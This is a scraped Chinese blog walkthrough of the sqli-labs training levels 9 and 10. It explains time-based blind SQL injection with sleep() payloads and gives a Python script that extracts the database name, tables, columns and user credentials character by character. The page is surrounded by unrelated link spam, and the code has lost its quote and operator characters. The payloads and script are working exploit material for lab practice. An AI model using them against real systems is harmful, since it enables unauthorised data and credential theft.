当前位置: 首页 > news >正文

贵州住房与城乡建设部网站动漫短视频怎么制作教程

贵州住房与城乡建设部网站,动漫短视频怎么制作教程,weirdcore制作网站,wordpress批量提交表单第九关#xff1a; 这一关相比第八关#xff0c;第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in #xff0c;这个时候布尔盲注就不适合我们用#xff0c;所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果…第九关 这一关相比第八关第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in 这个时候布尔盲注就不适合我们用所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以考虑使用时间盲注。 判断注入点 基于时间的注入延时注入              1. Time-based blind SQL injection                 2.利用前提页面没有显示位也没有输入SQL语句执行错误信息正确的SQL语句和错误的返回页面都一样但                 是加入sleep5条件后正确的SQL语句页面返回速度明显慢了5秒错误的SQL语句立即返回。                 3.优点不需要显示位不需要报错信息。                 4.缺点速度慢耗费大量时间                 5.用法IF(ConditionAB)函数                 当Condition为TRUE时返回A否则返回B。                      6.示例    SELECT * FROM users WHERE id1 AND IF(ASCII(SUBSTR(USER(),1,1))65 ,SLEEP(5),1);        ?id1 and sleep(3) --          有明显延迟 ?id1 and sleep(3) --          无延迟 ?id1) and sleep(3) --         无延迟 说明这里的闭合是单引号。   位数暂时不判断了用脚本的话不需要位数 当请求错误时延迟时间在3S以后 当请求正确时延迟时间很短在3S以内 基于这个我们就可以写脚本来帮助我们注入 import time import requests url http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php #二分法 def inject_database(url):namefor i in range(1,20):low 32high 128mid (low high) // 2while low high:payload 1 and if(ascii(substr(database(),%d,1)) %d,sleep(1),0)-- % (i, mid)params {id: payload}start_time time.time()r requests.get(url,paramsparams)end_time time.time()if end_time - start_time 1:low mid 1else:high midmid (low high) // 2if mid 32:breakname chr(mid)print(name)inject_database(url) 有点慢但是也是成功拿下数据 下边的操作和之前的一样 爆表 payload 1 and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schemasecurity),%d,1)) %d,sleep(1),0)-- % (i, mid)  爆字段 payload 1 and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemasecurityand table_nameusers),%d,1)) %d,sleep(1),0)-- % (i, mid) username,password payload 1 and if(ascii(substr((select group_concat(username) from information_schema.columns where table_schemasecurityand table_nameusers),%d,1)) %d,sleep(1),0)-- % (i, mid)             payload 1 and if(ascii(substr((select group_concat(password) from information_schema.columns where table_schemasecurityand table_nameusers),%d,1)) %d,sleep(1),0)-- % (i, mid) 拿下 第十关 和第九关不一样的就是这里是双引号 还是时间盲注稍微修改直接使用 成功拿到数据库 后边的操作都是如法炮制
http://www.hkea.cn/news/14474727/

相关文章:

  • 天津专门做企业网站公司php网站建设制作方案
  • 顺德建网站成都住建局官网住建扬尘监测
  • 广州网站设计首选柚米电子商务网站建设考试简答题
  • 防止做网站的人修改数值西丽网站建设
  • 制作图片的免费网站用cms建设网站课程宅门
  • 东莞市公司网站建设平台seo课
  • 域名信息备案管理系统查询seo 网站结构优化
  • 东莞网站代理平台推荐
  • 哪些属于网站评论建设部特种作业证网站查询
  • seo站长网网站建设的功能需求文档
  • 网站建设与管理好找工作吗网络架构oss
  • 有公司可以做网站升级ipv6拼多多流量推广神器
  • 嘉兴简单建站seo外链工具软件
  • 南京网络建站模板网站开发方法
  • 网站建设经典教材亚马逊雨林在地图上的位置
  • 如何自己建营销网站wordpress4.9.8中文版
  • 电商运营网站微信开放平台认证费用
  • 网站专栏建设情况公司做网站需要什么条件
  • 怎么查询网站的空间商加强图书馆网站建设
  • 如何借助织梦制作一个简单的网站北京有名的广告公司
  • 哪些网站可以做商家网站建设技术方案
  • 网站做301重定向的作用网站免费正能量不下载
  • 网站服务器租wordpress双语导航
  • 免费的网站生成app咪呜瀑布流WordPress模板
  • 做301重定向会影响网站权重吗济南工装定制公司
  • 个人不能建设论坛网站怎么办中国移动社区app下载
  • 网站程序 wap pc 同步广州网站定制开发设计
  • 移动网站优化买了域名之后怎么用
  • 海口网站开发邯郸怎样做网站
  • 做网站时背景音乐工程建筑模板价格